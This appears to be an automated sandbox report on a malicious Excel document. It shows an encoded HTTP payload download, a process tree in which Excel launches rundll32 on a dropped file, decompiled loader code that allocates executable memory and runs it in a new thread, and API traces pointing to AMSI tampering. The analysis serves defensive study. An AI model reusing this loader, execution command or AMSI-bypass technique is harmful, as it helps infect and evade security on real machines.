                            Transfer-Encoding: chunked
                            Content-Type: application/octet-stream
                            Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 72 7f 60 53 d5 dd f7 49 72 9b 5e da 94 dc 62 a3 55 aa d6 c7 b8 e1 40 45 83 0a 6f c1 55 ed 2d 6c 23 78 af 91 04 84 b6 fa 08 31 de b9 0d 35 17 70 52 2c 0b d5 de 1d e2 d8 86 cf dc 04 05 c5 4d 37 37 9d 43 ed 36 27 a1 ed 5a 3a 19 a2 22 14 01 ad 5a f5 60 a3 06 a9 50 34 70 de ef b9 37 c9 4d 42 da 3d ef df af 85 dc 7b ee f9 7e 3e df 1f 9f ef c7 7b e3 5a 64 43 08 71 f0 a3 14 a1 76 64 fc d5 a2 ff fc 37 0c bf b1 e7 fe 6d 2c da 32 e6 df e7 b5 5b 66 ff fb bc 1b 42 b7 dd 55 bd e4 ce 1f dd 7a e7 cd 3f a8 be e5 e6 1f fe f0 47 e1 ea ff 5e 5c 7d a7 fa c3 ea db 7e 58 5d 77 9d af fa 07 3f 5a b4 f8 e2 b2 b2 12 77 2a c7 c9 eb ba e7 fc ed e2 27 cf 4e ff e2 97 fe fd ec 47 53 e7 07 e1 d7 07 df 4f e9 df 4f 9d 7d db 25 4f 9e 3d ed b2 df 9e bd 09 be af bf f4 b1 b3 cf d3 df 8f 9f 3d 11 de d6 09 7f 3a fb ef fa f7 d3 c6 fb b6 5b 42 2c c7 48 bd 4b 22 42 b3 2d 76 f4 cb ef dd 7e 53 fa ae 1f 8d 3d af 14 ee 50 0b a8 51 6b d7 ef ae 9a 6a 41 48 80 c3 5a a6 10 9c 04 fd a9 eb 85 90 f9 46 bb 4a 0c 1c fc 59 91 01 35 be 85 cc 3d 7b d5 de 5c 84 7c fa 97 1d 71 16 a4 d7 79 52 c8 64 31 ff 6e 2a 41 8b 1a 8d ba 55 ff 8b 5d a4 ff 2a c6 d8 91 c0 8f 1c bf 38 bc 78 79 18 de 57 a8 9c d1 50 0b 97 e9 2f fd 57 0d d5 2f be 73 d1 cd e1 9b 11 fa e5 6b 46 0f 20 4e 5a 83 cc 5f 2d fc bf d8 80 a1 27 57 c3 63 49 91 61 1c f6 ce c5 c5 2e be cd 00 56 5e ca 6e ec 06 ee d9 02 b8 3b ef ba f3 16 96 4f 48 ed a0 1a de 89 53 70 b5 17 df b9 f8 f6 1f 01 f0 e2 c5 48 d7 0a 2d 81 b7 50 92 8f bb 66 64 25 be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff fe ff fa 6b ff 4b 13 27 90 1b ab 2d 48 96 37 ad 59 59 24 44 16 c7 91 5f 13 13 8a 25 2a 26 1a 25 85 57 90 a6 26 c9 be a9 1c c2 5e 1e ee 24 72 d1 56 2b dc c5 5b 16 27 51 d4 9b 20 4f 6d b3 42 68 08 8b 7c e3 22 ad 8c 25 ed ed e0 10 0d bb 39 46 96 c9 df 80 1a e9 12 e0 6e 2e 8e cb 72 54 1c 96 14 bb 62 25 f7 b1 94 22 8f bd c3 1a 3c 92 da 2c 2e c3 83 b0 4c 7e 92 c3 8b 8a 49 49 29 55 6c e4 3a 9d 96 ec ed d4 91 70 23 93 79 85 90 1c b9 20 0f c9 c9 e4 e2 42 c8 22 f2 d5 95 b9 c8 22 99 70 85 90 76 f2 5a 1e d2 2e 93 b7 ae cc 45 9e 94 14 ab 52 4c 7e 07 d7 41 2c 9e ec ed 74 6e ad 73 73 fa a5 4c fe 58 08 cc 93 1f 9f 0a e6 65 d2 92 01 b7 f7 b2 35 fd e5 1c 58 93 5f 99 4e 7e c5 db 10 4e cc d7 d4 84 27 56 93 d0 c4 64 d8 89 77 92 77 7a ac a8 c7 3e 75 2d 27 e0 6e 58 48 66 1b 9d 50 ca 13 93 24 89 aa 55 54 ad a4 6a 05 55 05 aa 3a 42 09 80 92 f5 21 84 1a 3a aa 90 1f 1f 26 15 00 3f 5a e7 e6 2d e1 62 3f 59 00 45 e6 e3 ee 46 28 7f a8 e9 75 2b 6a af 06 78 67 4a 0d 05 31 3d ac 8a 45 26 37 58 6c 4c 92 48 57 a5 a1 4a a8 fa 8e 22 41 41 f0 8f 63 e1 cb 21 1c e9 aa 32 85 4c 53 61 c5 67 e6 53 dd 26 15 c2 5f a2 02 54 1b 50 61 e7 6f a3 3c ea 04 93 0a e1 ad 79 d4 93 8c 0a 35 99 09 1e 87 18 13 5b e7 1a 7a 87 26 99 6c 40 ac 1a 89 0d c6 58 5c 80 3d d9 64 03 e2 da 0c bb fd 08 5b 5b b2 0a d6 26 6f 5a b3 b2 48 88 2c 8e 23 bf 26 26 14 4b 54 4c 34 b2 ac 3c 64 b5 cb 9a 9a 24 0e 36 91 97 87 bc 10 93 48 cf df ad 48 53 e3 2d 8b 93 28 ea 4d 90 6b 5f b6 42 74 08 8b 7c 66 af 50 40 9f 7c 8a 59 1d
                            Data Ascii: 1faar`SIr^bU@EoU-l#x15pR,M77C6'Z:"Z`P4p7MB={~>{ZdCqvd7m,2[fBUz?G^\}~X]w?Zw*'NGSOO}%O==:[B,HK"B-v~S=PQkjAHZFJY5={\|qyRd1n*AU]*8xyWP/W/skF NZ_-'WcIa.V^n;OHSpH-Pfd%kK'-H7YY$D_%*&%W&^$rV+['Q OmBh|"%9Fn.rTb%"<,.L~II)Ul:p#y B""pvZ.ERL~A,tnssLXe5X_N~N'Vdwwz>u-'nXHfP$UTjU:B!:&?Z-b?YEF(u+jxgJ1=E&7XlLHWJ"AAc!2LSagS&_TPao<y5[z&l@X\=d[[&oZH,#&&KTL4<d$6HHS-(Mk_Bt|fP@|Y
                            Apr 7, 2021 05:51:05.299679041 CEST3INData Raw: ec f8 4f 6a 2d dc 3b b8 ef 29 88 e5 f7 3e d5 64 03 e2 fe 91 d8 60 c7 ef 17 60 4f 37 d9 80 f8 4e 86 dd 7e ee 4d 30 b9 f5 3f 4d 3e 46 9f 7c 1c b5 66 4f fe ef bf e5 4c fe 9d 7f 8c 38 79 ad 59 7d 8c 4c 5e 39 99 a9 fe 3d 56 7d f5 f8 ff 50 bd 44 af be
                            Data Ascii: Oj-;)>d``O7N~M0?M>F|fOL8yY}L^9=V}PDdNr%2yL.e%:BxDwSEm2`K&a/c]wm.ZkhE>V&#I2yjL6 JdrB#eR}Dcm'ky^dR!|~!
                            Apr 7, 2021 05:51:05.299716949 CEST4INData Raw: db 36 6d 6e a2 95 62 a9 5a 6b 26 4b 97 80 e4 b6 d7 b4 b9 c3 d1 8a b1 3f 2d 6e 13 4b 9d 2f 5a b1 9a 88 2c 4e a2 e8 94 fb b0 38 6c 3b 8c 91 6d 5b 4b 73 29 0a bb 71 df c4 06 10 34 3e 68 c3 0d f1 9f 56 d5 ac de 1f 2e 9b 7a ae 3a 86 8a c9 99 2d df 46
                            Data Ascii: 6mnbZk&K?-nK/Z,N8l;m[Ks)q4>hV.z:-F!H-kjonCJ*EaC\S#;7zm}:uR4S+<C(\$t1!IaQn-cQn1v[bu^-v-yWnGn_pJScn[]n5
                            Apr 7, 2021 05:51:05.299757004 CEST6INData Raw: cc 5a c4 a5 9f 77 30 4f 91 31 fa 79 80 99 89 9c a8 64 e7 03 cc 45 e4 30 3b 8b 71 fc 8a a4 5b c7 f2 39 a5 92 11 2b 26 a7 eb 9c b8 1e b8 e2 2c 0e 29 cc c0 13 3f 85 ba 3a 81 dc 79 58 07 ef 06 00 4f 0e 55 9a e0 31 67 e9 49 21 24 91 81 cb 40 7b 68 10
                            Data Ascii: Zw0O1ydE0;q[9+&,)?:yXOU1gI!$@{hcHWh+v[DPB?f*gD<^J,ZL.b9(ylb"sL229wIxE"S-B:nb5%3)K_@J"+Jg3LWN~I'&-K7%
                            Apr 7, 2021 05:51:05.299799919 CEST7INData Raw: b2 34 f2 4e 13 39 96 8c 31 91 ff 4c 21 43 19 e4 2c 13 e9 24 ef 6c cc 20 1f 4e 23 33 d5 cf 31 91 02 79 de 44 de 91 42 ce cb 20 87 36 65 90 e5 04 9b c8 99 29 e4 a4 4c f5 7f 01 12 50 e3 18 9a dc 6c 22 cf 4e 21 13 4b d3 c8 8d 66 ce d3 c8 95 26 f2 c8
                            Data Ascii: 4N91L!C,$l N#31yDB 6e)LPl"N!Kf&#r e&P`C2aviw>>fAsm~8,[LZz-,5mq:y-<-.*JE&=e3d<wxd55.XA~^HC!kj"83=QwbvxM
                            Apr 7, 2021 05:51:05.299849033 CEST8INData Raw: d7 72 42 8f 3d b6 8e 13 70 77 53 63 ba 8b 54 ad 5b 07 29 cd d4 5a 68 d6 8a 6c 5b 28 87 88 0d dc 1e 76 3b 48 a5 64 43 6c c2 36 48 d2 d9 fe 24 eb e0 2c e8 20 12 af f5 07 f0 71 82 3f b7 a2 e8 b2 85 ca 18 bc 93 dc b2 87 d2 a8 f7 00 e9 29 e2 8c 66 bc
                            Data Ascii: rB=pwScT[)Zhl[(v;HdCl6H$, q?)f]pzwtIyF?<p_8s)gymJ%#f'.;[PT'>b?nBH"+K@gIch%hg=8e- dK!zN6Y)}d3;b9(-EVJK
                            Apr 7, 2021 05:51:05.299885988 CEST9INData Raw: a7 cd d7 4f 8e c0 86 be 5e 28 c0 5e 92 b3 ca 75 23 b1 61 57 cb 0b b0 c3 39 db f4 67 d8 2c cc 4b c6 33 b4 3c 67 8f 97 9e 34 74 e4 73 41 2b 4c 90 5d 26 8e c2 a0 16 13 54 2c 93 8f 4e 14 04 ad 36 41 bc 4c 3a 0a 83 da 4c d0 18 d8 7f 61 d0 1a 13 54 02
                            Data Ascii: O^(^u#aW9g,K3<g4tsA+L]&T,N6AL:LaT5A23A\yb$eL/+ueg!3X|4<&dr8ef2y.Y&\&l*VLd`-&s3'7tT"v,C<kO!X %YG:Bq&uTAN 7
                            Apr 7, 2021 05:51:05.299926043 CEST10INData Raw: 31 66 61 30 0d 0a af 84 de 95 29 58 29 93 ba 2f 73 84 7e be 25 a7 da a5 05 aa 15 10 7a b7 29 34 a4 3c 7c 3c 2d 34 78 53 8e b0 54 62 52 41 92 32 06 4a 5a 64 f2 da f1 54 c9 4a c5 42 61 e0 b3 8e c0 b7 c8 f7 76 70 85 08 56 99 6c cc 23 1c fa 7c 34 82
                            Data Ascii: 1fa0)X)/s~%z)4<|<-4xSTbRA2JZdTJBavpVl#|4M&?#JdrU\BH&'&*w03IXb+^&L]g*K#pY}e{sVr+l0[5|W/]5ArJG%#'
                            Apr 7, 2021 05:51:05.299967051 CEST12INData Raw: b8 cd 10 2f 49 cc 45 b1 e8 3e 11 72 19 0b a9 64 29 c5 54 0d 31 55 54 74 18 15 96 43 05 b6 2e 0b 53 e7 45 92 5a d7 54 b6 ae 4a 82 de 4b ad ab 02 39 b7 c2 44 52 a8 c5 6c 08 d4 b8 9f 64 af df b9 55 74 b0 8a 52 54 74 84 56 a7 f2 5a 15 24 93 a6 74 de
                            Data Ascii: /IE>rd)T1UTtC.SEZTJK9DRldUtRTtVZ$t*A|7/beMwh[(,`krBREO]cGIu9_C*(W2LP)cf: nS`w}7]npd]S7rHTy9|Q$^
                            Apr 7, 2021 05:51:05.300005913 CEST13INData Raw: f5 1a ce e0 42 37 e4 b4 fb e2 9e 51 da 85 25 fc 6a 4f 6e bb fd af e6 98 39 8f 00 d2 07 f3 08 cf 8c 4a 28 92 c9 e5 79 84 95 b9 84 a8 78 92 81 61 6c c5 2e 13 1e c0 41 2c 9e 34 d5 9f 97 1e 87 57 78 99 90 37 47 19 07 e2 db df cc 2d 56 6e 16 f3 c4 24
                            Data Ascii: B7Q%jOn9J(yxal.A,4Wx7G-Vn$IR,JLTvff"8!xP3)g4vQZ0"3`> K<X+snR(dh&cqpAl_J}71)|Yo4.OC-l)
                            Apr 7, 2021 05:51:05.463424921 CEST15INData Raw: 14 09 ce 42 90 bc a7 7e f6 ba 0d 9c d0 53 2f 2d 67 2f fb 00 64 c4 dd e9 62 bd 1d 1c 82 9c a4 02 ce 47 eb dc bc 25 5c ec 27 fc 23 56 34 1f 30 10 6b b7 29 50 fa dd bf 30 bd 04 00 06 34 75 20 95 a3 7e 52 8f 98 84 a1 d1 b1 be f1 b1 d6 98 26 26 c2 b5
                            Data Ascii: B~S/-g/dbG%\'#V40k)P04u ~R&&Q1_M<!Kg#m[2zblQ@e.@j'$5}l$dM\gE:*+b2,N0M2muU)V[{9]bR kjT39pyml^yM


                            Code Manipulations

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Start time:05:50:30
                            Start date:07/04/2021
                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            Wow64 process (32bit):false
                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                            Imagebase:0x13ff10000
                            File size:27641504 bytes
                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:05:50:35
                            Start date:07/04/2021
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:rundll32 ..\sdbybsd.fds,StartW
                            Imagebase:0xff260000
                            File size:45568 bytes
                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:05:50:35
                            Start date:07/04/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32 ..\sdbybsd.fds,StartW
                            Imagebase:0x760000
                            File size:44544 bytes
                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:05:50:36
                            Start date:07/04/2021
                            Path:C:\Windows\System32\wermgr.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\system32\wermgr.exe
                            Imagebase:
                            File size:50688 bytes
                            MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Disassembly

                            Code Analysis

                            Reset < >

                              Executed Functions

                              APIs
                              • LoadLibraryW.KERNEL32(003A4054), ref: 003A1047
                              • GetProcAddress.KERNEL32(00000000), ref: 003A104E
                                • Part of subcall function 003A1B30: SetLastError.KERNEL32(0000000D,?,003A1070,?,00000040), ref: 003A1B3D
                              • SetLastError.KERNEL32(000000C1), ref: 003A1096
                              Memory Dump Source
                              • Source File: 00000004.00000002.2078469914.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                              Similarity
                              • API ID: ErrorLast$AddressLibraryLoadProc
                              • String ID:
                              • API String ID: 1866314245-0
                              • Opcode ID: 99f934b0cf2f947a60ab3ebabd83808da67444d120cccc304c7102426e49405c
                              • Instruction ID: 3a30aaf8e5832dca19cac778f99d23524b7f6fe6e06f29b32e87f9e30819be4e
                              • Opcode Fuzzy Hash: 99f934b0cf2f947a60ab3ebabd83808da67444d120cccc304c7102426e49405c
                              • Instruction Fuzzy Hash: 4DF1F9B4A00209EFDB05CF98D984AAEB7B5FF49304F208598E905AB351D775EE41DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00411000() {
                              				_Unknown_base(*)()* _v8;
                              				void* _v12;
                              				struct tagMSG _v40;
                              				long _v44;
                              				struct HWND__* _v48;
                              				long _v52;
                              				void* _v56;
                              				void* _t38;
                              				void* _t43;
                              				int _t45;
                              
                              				SetTimer(0, 0, 0x25b, 0); // executed
                              				while(GetMessageW( &_v40, 0, 0, 0) != 0) {
                              					_v40.message = _v40.message + 1;
                              					if(_v40.message != 0x114) {
                              						DispatchMessageW( &_v40);
                              						continue;
                              					} else {
                              					}
                              					break;
                              				}
                              				_v12 = 0;
                              				_v48 = 0;
                              				_v52 = 0x5000;
                              				while(_v52 > 0x1000) {
                              					_v52 = _v52 - 1;
                              				}
                              				_v44 = _v52;
                              				while(_v44 > 0x40) {
                              					_v44 = _v44 - 1;
                              				}
                              				do {
                              					_t38 = VirtualAlloc(_v12, 0x43000, _v52, _v44); // executed
                              					_v8 = _t38;
                              					if(_v8 == 0) {
                              						Sleep(0x1f4);
                              					}
                              				} while (_v8 == 0);
                              				_v48 =  &(_v48->i);
                              				E00411140(_v48, _v8);
                              				_t43 = CreateThread(0, 0, _v8, 1, 0, 0); // executed
                              				_v56 = _t43;
                              				SetTimer(0, 0, 0x2000, 0); // executed
                              				while(1) {
                              					_t45 = GetMessageW( &_v40, 0, 0, 0);
                              					if(_t45 == 0) {
                              						break;
                              					}
                              					_v40.message = _v40.message + 1;
                              					if(_v40.message == 0x114) {
                              						return _t45;
                              					}
                              					DispatchMessageW( &_v40);
                              				}
                              				return _t45;
                              			}













                              0x00411011
                              0x00411017
                              0x00411031
                              0x0041103b
                              0x00411043
                              0x00000000
                              0x00000000
                              0x0041103d
                              0x00000000
                              0x0041103b
                              0x0041104b
                              0x00411052
                              0x00411059
                              0x00411060
                              0x0041106f
                              0x0041106f
                              0x00411077
                              0x0041107a
                              0x00411086
                              0x00411086
                              0x0041108b
                              0x0041109c
                              0x004110a2
                              0x004110a9
                              0x004110b0
                              0x004110b0
                              0x004110b6
                              0x004110c2
                              0x004110cd
                              0x004110e0
                              0x004110e6
                              0x004110f4
                              0x004110fa
                              0x00411104
                              0x0041110c
                              0x00000000
                              0x00000000
                              0x00411114
                              0x0041111e
                              0x00000000
                              0x00000000
                              0x00411126
                              0x00411126
                              0x00411131

                              APIs
                              • SetTimer.USER32(00000000,00000000,0000025B,00000000), ref: 00411011
                              • GetMessageW.USER32 ref: 00411021
                              • DispatchMessageW.USER32(?), ref: 00411043
                              • VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 0041109C
                              • Sleep.KERNEL32(000001F4), ref: 004110B0
                              • CreateThread.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000), ref: 004110E0
                              • SetTimer.USER32(00000000,00000000,00002000,00000000), ref: 004110F4
                              • GetMessageW.USER32 ref: 00411104
                              • DispatchMessageW.USER32(?), ref: 00411126
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2078516635.0000000000411000.00000020.00000001.sdmp, Offset: 00410000, based on PE: true
                              • Associated: 00000004.00000002.2078513764.0000000000410000.00000004.00000001.sdmp Download File
                              • Associated: 00000004.00000002.2078542192.0000000000444000.00000002.00000001.sdmp Download File
                              Similarity
                              • API ID: Message$DispatchTimer$AllocCreateSleepThreadVirtual
                              • String ID: @
                              • API String ID: 368155642-2766056989
                              • Opcode ID: 4afdf7ac1f919f4dc8d8874e3125a6bb3b4688dc80b3f9090812339a25aa31d9
                              • Instruction ID: 867b812bce93da7f036e30a76c8419e4bff67dae8c80e6aba5d3a567ee532c80
                              • Opcode Fuzzy Hash: 4afdf7ac1f919f4dc8d8874e3125a6bb3b4688dc80b3f9090812339a25aa31d9
                              • Instruction Fuzzy Hash: 5D410B74E44208EBEB10CFE4DD49BDEBB74BB48705F204119E701BA2D0D779A980DB29
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetProcAddress.KERNEL32(?,?), ref: 006E08AD
                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 006E09BB
                              • CreateProcessInternalW.KERNEL32(?,00000000,?,00000000,00000000,00000000,0800000C,00000000,?,?,?), ref: 006E0A7A
                              • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 006E0D2B
                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,?,?), ref: 006E0D61
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2078594726.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false
                              Similarity
                              • API ID: CreateProcessWow64$AddressDirectoryDisableInternalProcRedirectionSystem
                              • String ID: L!m>$L!m>
                              • API String ID: 2693396481-4066150234
                              • Opcode ID: 5308dab8bd4f7a11c34c7d1564d5630d6296dfe534fbbdb590c938a06358a976
                              • Instruction ID: 2f4fcabcdabc3751762fefb89ad72727c295e346fd3cb4e8a39f70cb7954d54e
                              • Opcode Fuzzy Hash: 5308dab8bd4f7a11c34c7d1564d5630d6296dfe534fbbdb590c938a06358a976
                              • Instruction Fuzzy Hash: 32F1837420A384DFEB24CB5AC484A6A77E3EB59344F64481AF585CB3A1D6B5ECC1CF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetLastError.KERNEL32(0000007F), ref: 003A14DB
                              • SetLastError.KERNEL32(0000007F), ref: 003A1507
                              Memory Dump Source
                              • Source File: 00000004.00000002.2078469914.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: f36dff81a9cf3942351a051af493e4775feb70bf52faebc5a6cc478d76903a6c
                              • Instruction ID: 6e5a5393082dd647247060e84b2ed58eafc6d19c45e869fe0a1c9b6db83cea8f
                              • Opcode Fuzzy Hash: f36dff81a9cf3942351a051af493e4775feb70bf52faebc5a6cc478d76903a6c
                              • Instruction Fuzzy Hash: 45710974E04109DFCB05DF98C980AAEB7B6FF4A304F258598E816AB391D734EE41DB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 003A21F9
                              • SetLastError.KERNEL32(0000007E), ref: 003A223B
                              Memory Dump Source
                              • Source File: 00000004.00000002.2078469914.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                              Similarity
                              • API ID: ErrorHugeLastRead
                              • String ID:
                              • API String ID: 3239643929-0
                              • Opcode ID: 10cb3f2f79d117b8670fc8a10069001fd89d651e3ebad30ab9ff9c8dc1e87c76
                              • Instruction ID: 004b2d93a9b80ecca697d67c22f0f79e478563046c7b7e2900b525f75214a74e
                              • Opcode Fuzzy Hash: 10cb3f2f79d117b8670fc8a10069001fd89d651e3ebad30ab9ff9c8dc1e87c76
                              • Instruction Fuzzy Hash: 1E81A974A00209DFDB05CF98C894AAEBBB5FF49314F258158E949AB391D734EE85CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,00260005), ref: 002600E9
                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00260005), ref: 00260111
                              Memory Dump Source
                              • Source File: 00000004.00000002.2078432123.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                              Similarity
                              • API ID: AllocInfoNativeSystemVirtual
                              • String ID:
                              • API String ID: 2032221330-0
                              • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                              • Instruction ID: 51e42c8303bd72ffaeca8bab82230a7d90a1c2f3b00637cc5e0295864722eeba
                              • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                              • Instruction Fuzzy Hash: E9D1BD71A243068FDB24CF69C8D476BB3E0FF94308F18456DE8998B241E774E8A5DB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000004.00000002.2078469914.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f3d52aa46ef053cf39f99dbefe7a6b679e3e436dffe16e4e32d54890ebfdc073
                              • Instruction ID: d66f99ed4aa28d52ab79febf2d12ee6a4815639cc267df4d0add357c0304ca16
                              • Opcode Fuzzy Hash: f3d52aa46ef053cf39f99dbefe7a6b679e3e436dffe16e4e32d54890ebfdc073
                              • Instruction Fuzzy Hash: DC41B278A04209AFDB05CF44C494BAAB7B6FB89314F24C199E8199F355D775EE82CB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,003A1A51,00003000,00000004,000000BE,?,003A1A51,?), ref: 003A1A01
                              Memory Dump Source
                              • Source File: 00000004.00000002.2078469914.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 5d5b5cbf2e4e31beec734ddf41d954d48c274a836252b352d0efd9f8f7c683a7
                              • Instruction ID: 6f42475785112f297fd34f85fefda771551d831aad73c98a39c7bfdbcccf8eac
                              • Opcode Fuzzy Hash: 5d5b5cbf2e4e31beec734ddf41d954d48c274a836252b352d0efd9f8f7c683a7
                              • Instruction Fuzzy Hash: 6AD0C9B4645208BBE710CB84DC06F69BBACD705711F004185FE089B280D5B1AE0056A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualFree.KERNELBASE(?,?,?), ref: 003A182F
                              Memory Dump Source
                              • Source File: 00000004.00000002.2078469914.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                              Similarity
                              • API ID: FreeVirtual
                              • String ID:
                              • API String ID: 1263568516-0
                              • Opcode ID: 154cd5d664cb3d4cbf3288835350f6e4aee65aae7f208f56eb1411c34e7df905
                              • Instruction ID: d034658c04d337e3749e73c96629042909cac76406cdc00a78fb29bb72534bab
                              • Opcode Fuzzy Hash: 154cd5d664cb3d4cbf3288835350f6e4aee65aae7f208f56eb1411c34e7df905
                              • Instruction Fuzzy Hash: 66C04C7611430CAB8B04DFD8EC84DAB77ADBB8C710B048508BA1D87200D630F9108BA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Memory Dump Source
                              • Source File: 00000004.00000002.2078432123.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                              • Instruction ID: ac6c4a6abc099cb4c388a54b515f4d8e1f98344dfa0415abb08552477a137207
                              • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                              • Instruction Fuzzy Hash: 15F1FAB4A11209EFDB04CF94C9D0AAEB7B5FF48304F208558E906AB385D771EE91DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000004.00000002.2078432123.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                              • Instruction ID: 333699e3d4519b8425c908c2c6887e161c6ed70a2b9ea6b7636667cb5b911147
                              • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                              • Instruction Fuzzy Hash: 2D31A236A1474A8FC720DF18C4C0A2BB7E4FF89314F4609ADEA9587312D734F9969B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryExA.KERNEL32(003A4070,00000000,00000800), ref: 003A25F9
                              • GetProcAddress.KERNEL32(00000000,003A4078), ref: 003A2615
                              • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 003A2650
                              • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 003A2671
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2078469914.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                              Similarity
                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                              • String ID: AMSI
                              • API String ID: 3300690313-3828877684
                              • Opcode ID: 3da1a3ada49c8974b0ca91827e6a6bfb6142093446453bc0a8db605e278dac93
                              • Instruction ID: e653664b6f0e15bd115f1cda69d876503ae39e9ff0214ce5604b94992fa61181
                              • Opcode Fuzzy Hash: 3da1a3ada49c8974b0ca91827e6a6bfb6142093446453bc0a8db605e278dac93
                              • Instruction Fuzzy Hash: 3D112EB4E01209EFCB05CFD4C845BAEBBB8FF4A300F204559E60267390D7B46A44DB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 003A2468
                              • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 003A24B2
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2078469914.00000000003A1000.00000020.00000001.sdmp, Offset: 003A1000, based on PE: false
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID: @
                              • API String ID: 544645111-2766056989
                              • Opcode ID: d187b7f92bdeae7afd958770135958549968b752b777833516b191b6ce0f4f32
                              • Instruction ID: ed9316c1e582f171688b8345326f8a64663a50ec7eb76542b26cf247524d70c5
                              • Opcode Fuzzy Hash: d187b7f92bdeae7afd958770135958549968b752b777833516b191b6ce0f4f32
                              • Instruction Fuzzy Hash: 2521D8B0904209EFDB15CF99C984BAEBBB9FF49304F208199D906A7240C774AF40DB55
                              Uniqueness

                              Uniqueness Score: -1.00%